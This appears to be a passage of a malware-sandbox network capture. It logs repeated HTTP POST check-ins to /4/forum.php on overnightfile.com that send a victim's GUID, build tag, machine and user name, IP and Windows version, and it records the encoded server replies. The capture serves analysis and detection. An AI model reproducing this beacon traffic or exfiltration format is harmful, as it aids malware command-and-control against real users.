                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:55.803328037 CEST782INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNHSMARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:56.118315935 CEST782OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:56.206547976 CEST782INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTCXGARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:56.515702963 CEST783OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:20:56.603728056 CEST | 783 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZBYAARRABw==0
Jul 14, 2020 11:20:56.913007021 CEST | 784 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:20:57.003186941 CEST | 784 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cVJQEARRABw==0
Jul 14, 2020 11:20:57.308516026 CEST | 784 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:20:57.396816969 CEST | 785 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZBYAARRABw==0
Jul 14, 2020 11:20:57.710084915 CEST | 785 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:20:57.800950050 CEST | 785 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBZAYARRABw==0
Jul 14, 2020 11:20:58.160001040 CEST | 786 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:20:58.248193026 CEST | 786 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBNMYARRABw==0
Jul 14, 2020 11:20:58.584129095 CEST | 786 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:20:58.674938917 CEST | 787 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cMBYNARRABw==0
Jul 14, 2020 11:20:58.996056080 CEST | 787 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:20:59.084211111 CEST | 787 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZBYAARRABw==0
Jul 14, 2020 11:20:59.387290001 CEST | 788 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:20:59.475527048 CEST | 788 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 41 42 59 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cABYZARRABw==0
Jul 14, 2020 11:21:00.137196064 CEST | 789 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:00.234807014 CEST | 789 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:20:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFKPUARRABw==0
Jul 14, 2020 11:21:01.166742086 CEST | 789 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:01.257086039 CEST | 790 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 59 59 42 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cYYBBARRABw==0
Jul 14, 2020 11:21:01.638675928 CEST | 790 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:01.727490902 CEST | 790 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:01 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMVENARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:02.484544992 CEST791OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:02.584038019 CEST791INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBZAYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:02.943934917 CEST791OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:03.041389942 CEST792INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZGTAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:03.368863106 CEST792OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:03.472527027 CEST793INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 46 55 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVFUEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:03.796293974 CEST793OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:03.894206047 CEST793INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZAZAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:04.232069969 CEST794OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:04.330991983 CEST794INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 42 59 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cABYZARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:04.655843973 CEST794OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:04.758372068 CEST795INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:04 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNZAMARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:05.177768946 CEST795OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
